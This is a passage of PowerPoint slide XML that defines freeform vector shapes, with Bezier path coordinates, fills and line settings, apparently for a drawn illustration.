                  <a:gd name="connsiteX20" fmla="*/ 568019 w 2007347"/>
                  <a:gd name="connsiteY20" fmla="*/ 2605528 h 2918396"/>
                  <a:gd name="connsiteX21" fmla="*/ 594730 w 2007347"/>
                  <a:gd name="connsiteY21" fmla="*/ 2521968 h 2918396"/>
                  <a:gd name="connsiteX22" fmla="*/ 575553 w 2007347"/>
                  <a:gd name="connsiteY22" fmla="*/ 2345259 h 2918396"/>
                  <a:gd name="connsiteX23" fmla="*/ 608429 w 2007347"/>
                  <a:gd name="connsiteY23" fmla="*/ 2150058 h 2918396"/>
                  <a:gd name="connsiteX24" fmla="*/ 706372 w 2007347"/>
                  <a:gd name="connsiteY24" fmla="*/ 1767874 h 2918396"/>
                  <a:gd name="connsiteX25" fmla="*/ 1240608 w 2007347"/>
                  <a:gd name="connsiteY25" fmla="*/ 1608973 h 2918396"/>
                  <a:gd name="connsiteX26" fmla="*/ 1165952 w 2007347"/>
                  <a:gd name="connsiteY26" fmla="*/ 1886365 h 2918396"/>
                  <a:gd name="connsiteX27" fmla="*/ 1139240 w 2007347"/>
                  <a:gd name="connsiteY27" fmla="*/ 2050060 h 2918396"/>
                  <a:gd name="connsiteX28" fmla="*/ 1085817 w 2007347"/>
                  <a:gd name="connsiteY28" fmla="*/ 2426765 h 2918396"/>
                  <a:gd name="connsiteX29" fmla="*/ 1089733 w 2007347"/>
                  <a:gd name="connsiteY29" fmla="*/ 2501014 h 2918396"/>
                  <a:gd name="connsiteX30" fmla="*/ 1110351 w 2007347"/>
                  <a:gd name="connsiteY30" fmla="*/ 2583029 h 2918396"/>
                  <a:gd name="connsiteX31" fmla="*/ 1494014 w 2007347"/>
                  <a:gd name="connsiteY31" fmla="*/ 2824200 h 2918396"/>
                  <a:gd name="connsiteX32" fmla="*/ 1639399 w 2007347"/>
                  <a:gd name="connsiteY32" fmla="*/ 2918396 h 2918396"/>
                  <a:gd name="connsiteX33" fmla="*/ 1628785 w 2007347"/>
                  <a:gd name="connsiteY33" fmla="*/ 2889170 h 2918396"/>
                  <a:gd name="connsiteX34" fmla="*/ 1598135 w 2007347"/>
                  <a:gd name="connsiteY34" fmla="*/ 2789086 h 2918396"/>
                  <a:gd name="connsiteX35" fmla="*/ 1463891 w 2007347"/>
                  <a:gd name="connsiteY35" fmla="*/ 2415806 h 2918396"/>
                  <a:gd name="connsiteX36" fmla="*/ 1790597 w 2007347"/>
                  <a:gd name="connsiteY36" fmla="*/ 1692533 h 2918396"/>
                  <a:gd name="connsiteX37" fmla="*/ 1865937 w 2007347"/>
                  <a:gd name="connsiteY37" fmla="*/ 1439798 h 2918396"/>
                  <a:gd name="connsiteX38" fmla="*/ 1720735 w 2007347"/>
                  <a:gd name="connsiteY38" fmla="*/ 874741 h 2918396"/>
                  <a:gd name="connsiteX39" fmla="*/ 1933059 w 2007347"/>
                  <a:gd name="connsiteY39" fmla="*/ 913097 h 2918396"/>
                  <a:gd name="connsiteX40" fmla="*/ 1991962 w 2007347"/>
                  <a:gd name="connsiteY40" fmla="*/ 710361 h 2918396"/>
                  <a:gd name="connsiteX41" fmla="*/ 1659092 w 2007347"/>
                  <a:gd name="connsiteY41" fmla="*/ 171331 h 2918396"/>
                  <a:gd name="connsiteX42" fmla="*/ 1500877 w 2007347"/>
                  <a:gd name="connsiteY42" fmla="*/ 67223 h 291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7347" h="2918396">
                    <a:moveTo>
                      <a:pt x="1500877" y="67223"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1376222" y="50785"/>
                      <a:pt x="1138555" y="-2638"/>
                      <a:pt x="1152254" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1087187" y="111058"/>
                      <a:pt x="1043352" y="204207"/>
                      <a:pt x="911848" y="224754"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="845410" y="235029"/>
                      <a:pt x="835822" y="160372"/>
                      <a:pt x="792671" y="121332"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="782398" y="107634"/>
                      <a:pt x="742673" y="112428"/>
                      <a:pt x="667332" y="156948"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="556375" y="214481"/>
                      <a:pt x="443364" y="280918"/>
                      <a:pt x="356379" y="367902"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312544" y="411052"/>
                      <a:pt x="294051" y="430230"/>
                      <a:pt x="254327" y="471324"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259806" y="374751"/>
                      <a:pt x="273504" y="28183"/>
                      <a:pt x="273504" y="28183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="278299" y="29553"/>
                      <a:pt x="93371" y="30923"/>
                      <a:pt x="70083" y="36402"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61180" y="132290"/>
                      <a:pt x="6386" y="592556"/>
                      <a:pt x="222" y="678170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-5257" y="763785"/>
                      <a:pt x="91316" y="848714"/>
                      <a:pt x="221450" y="797345"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="370077" y="719265"/>
                      <a:pt x="628976" y="550090"/>
                      <a:pt x="782398" y="491187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="889930" y="511735"/>
                      <a:pt x="946093" y="857618"/>
                      <a:pt x="991298" y="955562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1049516" y="1080902"/>
                      <a:pt x="1089926" y="1106929"/>
                      <a:pt x="1117323" y="1165147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028968" y="1208296"/>
                      <a:pt x="567334" y="1363088"/>
                      <a:pt x="474870" y="1417196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="429666" y="1443223"/>
                      <a:pt x="334462" y="1651438"/>
                      <a:pt x="322133" y="1767874"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="298162" y="1839790"/>
                      <a:pt x="270764" y="2177455"/>
                      <a:pt x="274189" y="2209646"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="281038" y="2254165"/>
                      <a:pt x="293367" y="2408272"/>
                      <a:pt x="203642" y="2475394"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="175561" y="2500736"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="163233" y="2512380"/>
                      <a:pt x="161863" y="2525393"/>
                      <a:pt x="172136" y="2539091"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="238573" y="2538407"/>
                      <a:pt x="462541" y="2552105"/>
                      <a:pt x="568019" y="2605528"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="567334" y="2585665"/>
                      <a:pt x="589252" y="2544570"/>
                      <a:pt x="594730" y="2521968"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="606374" y="2456901"/>
                      <a:pt x="576923" y="2321287"/>
                      <a:pt x="575553" y="2345259"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="578293" y="2290466"/>
                      <a:pt x="610483" y="2204852"/>
                      <a:pt x="608429" y="2150058"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="608429" y="2128140"/>
                      <a:pt x="693359" y="1832256"/>
                      <a:pt x="706372" y="1767874"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="809110" y="1730889"/>
                      <a:pt x="1140610" y="1646644"/>
                      <a:pt x="1240608" y="1608973"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1232389" y="1719930"/>
                      <a:pt x="1182390" y="1832942"/>
                      <a:pt x="1165952" y="1886365"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1135816" y="1951432"/>
                      <a:pt x="1155678" y="1993897"/>
                      <a:pt x="1139240" y="2050060"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1120062" y="2070608"/>
                      <a:pt x="1088556" y="2425395"/>
                      <a:pt x="1085817" y="2426765"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1082221" y="2449367"/>
                      <a:pt x="1084233" y="2474581"/>
                      <a:pt x="1089733" y="2501014"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1110351" y="2583029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494014" y="2824200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1639399" y="2918396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1628785" y="2889170"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1617484" y="2857235"/>
                      <a:pt x="1607039" y="2825044"/>
                      <a:pt x="1598135" y="2789086"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1530328" y="2516489"/>
                      <a:pt x="1503616" y="2520598"/>
                      <a:pt x="1463891" y="2415806"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1491288" y="2313068"/>
                      <a:pt x="1722790" y="1850749"/>
                      <a:pt x="1790597" y="1692533"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1822102" y="1618562"/>
                      <a:pt x="1847445" y="1519934"/>
                      <a:pt x="1865937" y="1439798"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1946758" y="1088435"/>
                      <a:pt x="1763200" y="987752"/>
                      <a:pt x="1720735" y="874741"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1772104" y="904193"/>
                      <a:pt x="1889910" y="934329"/>
                      <a:pt x="1933059" y="913097"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2031688" y="864468"/>
                      <a:pt x="2009770" y="805565"/>
                      <a:pt x="1991962" y="710361"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1956347" y="519269"/>
                      <a:pt x="1807035" y="291192"/>
                      <a:pt x="1659092" y="171331"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1620052" y="139825"/>
                      <a:pt x="1554985" y="74073"/>
                      <a:pt x="1500877" y="67223"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="9484" cap="flat">
                <a:noFill/>
                <a:prstDash val="solid"/>
                <a:miter/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Freeform: Shape 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBA07EF8-F0BF-480B-82EA-BE16B7066AFC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="3432666" y="2249580"/>
                <a:ext cx="267118" cy="89040"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 377522 w 369933"/>
                  <a:gd name="connsiteY0" fmla="*/ 28864 h 123311"/>
                  <a:gd name="connsiteX1" fmla="*/ 338632 w 369933"/>
                  <a:gd name="connsiteY1" fmla="*/ 407 h 123311"/>
                  <a:gd name="connsiteX2" fmla="*/ 147973 w 369933"/>
                  <a:gd name="connsiteY2" fmla="*/ 27915 h 123311"/>
                  <a:gd name="connsiteX3" fmla="*/ 140385 w 369933"/>
                  <a:gd name="connsiteY3" fmla="*/ 29813 h 123311"/>
                  <a:gd name="connsiteX4" fmla="*/ 125208 w 369933"/>
                  <a:gd name="connsiteY4" fmla="*/ 26967 h 123311"/>
                  <a:gd name="connsiteX5" fmla="*/ 24662 w 369933"/>
                  <a:gd name="connsiteY5" fmla="*/ 34555 h 123311"/>
                  <a:gd name="connsiteX6" fmla="*/ 0 w 369933"/>
                  <a:gd name="connsiteY6" fmla="*/ 77240 h 123311"/>
                  <a:gd name="connsiteX7" fmla="*/ 22765 w 369933"/>
                  <a:gd name="connsiteY7" fmla="*/ 118027 h 123311"/>
                  <a:gd name="connsiteX8" fmla="*/ 74935 w 369933"/>
                  <a:gd name="connsiteY8" fmla="*/ 128461 h 123311"/>
                  <a:gd name="connsiteX9" fmla="*/ 143231 w 369933"/>
                  <a:gd name="connsiteY9" fmla="*/ 101902 h 123311"/>
                  <a:gd name="connsiteX10" fmla="*/ 201092 w 369933"/>
                  <a:gd name="connsiteY10" fmla="*/ 89571 h 123311"/>
                  <a:gd name="connsiteX11" fmla="*/ 349066 w 369933"/>
                  <a:gd name="connsiteY11" fmla="*/ 68703 h 123311"/>
                  <a:gd name="connsiteX12" fmla="*/ 377522 w 369933"/>
                  <a:gd name="connsiteY12" fmla="*/ 28864 h 123311"/>
                  <a:gd name="connsiteX13" fmla="*/ 49324 w 369933"/>
                  <a:gd name="connsiteY13" fmla="*/ 113285 h 123311"/>
                  <a:gd name="connsiteX14" fmla="*/ 12331 w 369933"/>
                  <a:gd name="connsiteY14" fmla="*/ 76291 h 123311"/>
                  <a:gd name="connsiteX15" fmla="*/ 49324 w 369933"/>
                  <a:gd name="connsiteY15" fmla="*/ 39298 h 123311"/>
                  <a:gd name="connsiteX16" fmla="*/ 86318 w 369933"/>
                  <a:gd name="connsiteY16" fmla="*/ 76291 h 123311"/>
                  <a:gd name="connsiteX17" fmla="*/ 49324 w 369933"/>
                  <a:gd name="connsiteY17" fmla="*/ 113285 h 12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9933" h="123311">
                    <a:moveTo>
                      <a:pt x="377522" y="28864"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="374676" y="9893"/>
                      <a:pt x="357602" y="-2438"/>
                      <a:pt x="338632" y="407"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="147973" y="27915"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="145128" y="27915"/>
                      <a:pt x="143231" y="28864"/>
                      <a:pt x="140385" y="29813"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="135642" y="28864"/>
                      <a:pt x="129951" y="27915"/>
                      <a:pt x="125208" y="26967"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91061" y="18430"/>
                      <a:pt x="55964" y="9893"/>
                      <a:pt x="24662" y="34555"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10434" y="43092"/>
                      <a:pt x="0" y="58269"/>
                      <a:pt x="0" y="77240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="94314"/>
                      <a:pt x="8537" y="109490"/>
                      <a:pt x="22765" y="118027"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36993" y="134153"/>
                      <a:pt x="55016" y="136050"/>
                      <a:pt x="74935" y="128461"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99598" y="125616"/>
                      <a:pt x="120466" y="110439"/>
                      <a:pt x="143231" y="101902"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="162202" y="96211"/>
                      <a:pt x="181173" y="92417"/>
                      <a:pt x="201092" y="89571"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="349066" y="68703"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="367088" y="64909"/>
                      <a:pt x="380368" y="47835"/>
                      <a:pt x="377522" y="28864"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="49324" y="113285"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28456" y="113285"/>
                      <a:pt x="12331" y="97159"/>
                      <a:pt x="12331" y="76291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12331" y="55423"/>
                      <a:pt x="28456" y="39298"/>
                      <a:pt x="49324" y="39298"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70193" y="39298"/>
                      <a:pt x="86318" y="55423"/>
                      <a:pt x="86318" y="76291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86318" y="97159"/>
                      <a:pt x="70193" y="113285"/>
                      <a:pt x="49324" y="113285"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0B0907"/>
              </a:solidFill>
              <a:ln w="948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D7A5159-CB10-4306-8107-40F857710624}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="3384518" y="2224808"/>
                <a:ext cx="246571" cy="328762"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 345545 w 341477"/>
                  <a:gd name="connsiteY0" fmla="*/ 348679 h 455302"/>
                  <a:gd name="connsiteX1" fmla="*/ 323728 w 341477"/>
                  <a:gd name="connsiteY1" fmla="*/ 226316 h 455302"/>
                  <a:gd name="connsiteX2" fmla="*/ 288632 w 341477"/>
                  <a:gd name="connsiteY2" fmla="*/ 90674 h 455302"/>
                  <a:gd name="connsiteX3" fmla="*/ 261124 w 341477"/>
                  <a:gd name="connsiteY3" fmla="*/ 28070 h 455302"/>
                  <a:gd name="connsiteX4" fmla="*/ 241205 w 341477"/>
                  <a:gd name="connsiteY4" fmla="*/ 10047 h 455302"/>
                  <a:gd name="connsiteX5" fmla="*/ 210851 w 341477"/>
                  <a:gd name="connsiteY5" fmla="*/ 562 h 455302"/>
                  <a:gd name="connsiteX6" fmla="*/ 152041 w 341477"/>
                  <a:gd name="connsiteY6" fmla="*/ 3407 h 455302"/>
                  <a:gd name="connsiteX7" fmla="*/ 117893 w 341477"/>
                  <a:gd name="connsiteY7" fmla="*/ 12893 h 455302"/>
                  <a:gd name="connsiteX8" fmla="*/ 104614 w 341477"/>
                  <a:gd name="connsiteY8" fmla="*/ 29018 h 455302"/>
                  <a:gd name="connsiteX9" fmla="*/ 98922 w 341477"/>
                  <a:gd name="connsiteY9" fmla="*/ 42298 h 455302"/>
                  <a:gd name="connsiteX10" fmla="*/ 102717 w 341477"/>
                  <a:gd name="connsiteY10" fmla="*/ 65063 h 455302"/>
                  <a:gd name="connsiteX11" fmla="*/ 158681 w 341477"/>
                  <a:gd name="connsiteY11" fmla="*/ 54629 h 455302"/>
                  <a:gd name="connsiteX12" fmla="*/ 170064 w 341477"/>
                  <a:gd name="connsiteY12" fmla="*/ 68857 h 455302"/>
                  <a:gd name="connsiteX13" fmla="*/ 165321 w 341477"/>
                  <a:gd name="connsiteY13" fmla="*/ 103953 h 455302"/>
                  <a:gd name="connsiteX14" fmla="*/ 78054 w 341477"/>
                  <a:gd name="connsiteY14" fmla="*/ 119130 h 455302"/>
                  <a:gd name="connsiteX15" fmla="*/ 66672 w 341477"/>
                  <a:gd name="connsiteY15" fmla="*/ 142844 h 455302"/>
                  <a:gd name="connsiteX16" fmla="*/ 36318 w 341477"/>
                  <a:gd name="connsiteY16" fmla="*/ 157072 h 455302"/>
                  <a:gd name="connsiteX17" fmla="*/ 26833 w 341477"/>
                  <a:gd name="connsiteY17" fmla="*/ 182683 h 455302"/>
                  <a:gd name="connsiteX18" fmla="*/ 5016 w 341477"/>
                  <a:gd name="connsiteY18" fmla="*/ 190271 h 455302"/>
                  <a:gd name="connsiteX19" fmla="*/ 2171 w 341477"/>
                  <a:gd name="connsiteY19" fmla="*/ 224419 h 455302"/>
                  <a:gd name="connsiteX20" fmla="*/ 57186 w 341477"/>
                  <a:gd name="connsiteY20" fmla="*/ 371444 h 455302"/>
                  <a:gd name="connsiteX21" fmla="*/ 67620 w 341477"/>
                  <a:gd name="connsiteY21" fmla="*/ 397055 h 455302"/>
                  <a:gd name="connsiteX22" fmla="*/ 71415 w 341477"/>
                  <a:gd name="connsiteY22" fmla="*/ 424563 h 455302"/>
                  <a:gd name="connsiteX23" fmla="*/ 86591 w 341477"/>
                  <a:gd name="connsiteY23" fmla="*/ 426460 h 455302"/>
                  <a:gd name="connsiteX24" fmla="*/ 97025 w 341477"/>
                  <a:gd name="connsiteY24" fmla="*/ 435945 h 455302"/>
                  <a:gd name="connsiteX25" fmla="*/ 121688 w 341477"/>
                  <a:gd name="connsiteY25" fmla="*/ 454916 h 455302"/>
                  <a:gd name="connsiteX26" fmla="*/ 317088 w 341477"/>
                  <a:gd name="connsiteY26" fmla="*/ 438791 h 455302"/>
                  <a:gd name="connsiteX27" fmla="*/ 345545 w 341477"/>
                  <a:gd name="connsiteY27" fmla="*/ 415077 h 455302"/>
                  <a:gd name="connsiteX28" fmla="*/ 345545 w 341477"/>
                  <a:gd name="connsiteY28" fmla="*/ 348679 h 45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1477" h="455302">
                    <a:moveTo>
                      <a:pt x="345545" y="348679"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="343648" y="306943"/>
                      <a:pt x="332265" y="267104"/>
                      <a:pt x="323728" y="226316"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="318986" y="202602"/>
                      <a:pt x="292426" y="112490"/>
                      <a:pt x="288632" y="90674"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="283889" y="66960"/>
                      <a:pt x="279147" y="44195"/>
                      <a:pt x="261124" y="28070"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="254484" y="20481"/>
                      <a:pt x="248793" y="17636"/>
                      <a:pt x="241205" y="10047"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="232668" y="1510"/>
                      <a:pt x="218439" y="-1335"/>
                      <a:pt x="210851" y="562"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="194726" y="1510"/>
                      <a:pt x="178600" y="2459"/>
                      <a:pt x="152041" y="3407"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139710" y="3407"/>
                      <a:pt x="124533" y="7202"/>
                      <a:pt x="117893" y="12893"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111254" y="17636"/>
                      <a:pt x="109356" y="23327"/>
                      <a:pt x="104614" y="29018"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101768" y="32812"/>
                      <a:pt x="101768" y="38504"/>
                      <a:pt x="98922" y="42298"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96077" y="47041"/>
                      <a:pt x="99871" y="61269"/>
                      <a:pt x="102717" y="65063"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122636" y="69806"/>
                      <a:pt x="141607" y="57475"/>
                      <a:pt x="158681" y="54629"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="171961" y="52732"/>
                      <a:pt x="171012" y="55578"/>
                      <a:pt x="170064" y="68857"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170064" y="81188"/>
                      <a:pt x="166269" y="92571"/>
                      <a:pt x="165321" y="103953"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156784" y="105850"/>
                      <a:pt x="107459" y="114387"/>
                      <a:pt x="78054" y="119130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67620" y="123873"/>
                      <a:pt x="73312" y="134307"/>
                      <a:pt x="66672" y="142844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59083" y="151381"/>
                      <a:pt x="41061" y="150432"/>
                      <a:pt x="36318" y="157072"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30627" y="164661"/>
                      <a:pt x="27781" y="173197"/>
                      <a:pt x="26833" y="182683"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24936" y="184580"/>
                      <a:pt x="12605" y="180786"/>
                      <a:pt x="5016" y="190271"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-1624" y="200705"/>
                      <a:pt x="-675" y="213985"/>
                      <a:pt x="2171" y="224419"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5016" y="235802"/>
                      <a:pt x="49598" y="354370"/>
                      <a:pt x="57186" y="371444"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60981" y="379981"/>
                      <a:pt x="64775" y="388518"/>
                      <a:pt x="67620" y="397055"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69517" y="405592"/>
                      <a:pt x="70466" y="414128"/>
                      <a:pt x="71415" y="424563"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75209" y="428357"/>
                      <a:pt x="81849" y="424563"/>
                      <a:pt x="86591" y="426460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91334" y="427408"/>
                      <a:pt x="94180" y="432151"/>
                      <a:pt x="97025" y="435945"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104614" y="444482"/>
                      <a:pt x="111254" y="451122"/>
                      <a:pt x="121688" y="454916"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134019" y="458710"/>
                      <a:pt x="247844" y="473887"/>
                      <a:pt x="317088" y="438791"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="328471" y="433099"/>
                      <a:pt x="329420" y="419820"/>
                      <a:pt x="345545" y="415077"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="344596" y="383775"/>
                      <a:pt x="346493" y="371444"/>
                      <a:pt x="345545" y="348679"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FDCE98"/>
              </a:solidFill>
              <a:ln w="94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 name="Freeform: Shape 73">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09348695-8C92-4756-A56C-873F91BDD331}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="739140" flipH="1">
                <a:off x="810119" y="1920919"/>
                <a:ext cx="1672157" cy="1815955"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 635481 w 1672157"/>
                  <a:gd name="connsiteY0" fmla="*/ 17286 h 1815955"/>
                  <a:gd name="connsiteX1" fmla="*/ 336659 w 1672157"/>
                  <a:gd name="connsiteY1" fmla="*/ 16551 h 1815955"/>
                  <a:gd name="connsiteX2" fmla="*/ 172279 w 1672157"/>
                  <a:gd name="connsiteY2" fmla="*/ 313121 h 1815955"/>
                  <a:gd name="connsiteX3" fmla="*/ 99678 w 1672157"/>
                  <a:gd name="connsiteY3" fmla="*/ 732290 h 1815955"/>
                  <a:gd name="connsiteX4" fmla="*/ 99677 w 1672157"/>
                  <a:gd name="connsiteY4" fmla="*/ 732976 h 1815955"/>
                  <a:gd name="connsiteX5" fmla="*/ 29131 w 1672157"/>
                  <a:gd name="connsiteY5" fmla="*/ 789139 h 1815955"/>
                  <a:gd name="connsiteX6" fmla="*/ 22966 w 1672157"/>
                  <a:gd name="connsiteY6" fmla="*/ 884343 h 1815955"/>
                  <a:gd name="connsiteX7" fmla="*/ 88033 w 1672157"/>
                  <a:gd name="connsiteY7" fmla="*/ 941191 h 1815955"/>
                  <a:gd name="connsiteX8" fmla="*/ 116801 w 1672157"/>
                  <a:gd name="connsiteY8" fmla="*/ 995300 h 1815955"/>
                  <a:gd name="connsiteX9" fmla="*/ 183922 w 1672157"/>
                  <a:gd name="connsiteY9" fmla="*/ 1046668 h 1815955"/>
                  <a:gd name="connsiteX10" fmla="*/ 233237 w 1672157"/>
                  <a:gd name="connsiteY10" fmla="*/ 1006258 h 1815955"/>
                  <a:gd name="connsiteX11" fmla="*/ 257209 w 1672157"/>
                  <a:gd name="connsiteY11" fmla="*/ 845302 h 1815955"/>
                  <a:gd name="connsiteX12" fmla="*/ 345563 w 1672157"/>
                  <a:gd name="connsiteY12" fmla="*/ 368599 h 1815955"/>
                  <a:gd name="connsiteX13" fmla="*/ 448392 w 1672157"/>
                  <a:gd name="connsiteY13" fmla="*/ 253736 h 1815955"/>
                  <a:gd name="connsiteX14" fmla="*/ 693940 w 1672157"/>
                  <a:gd name="connsiteY14" fmla="*/ 1062166 h 1815955"/>
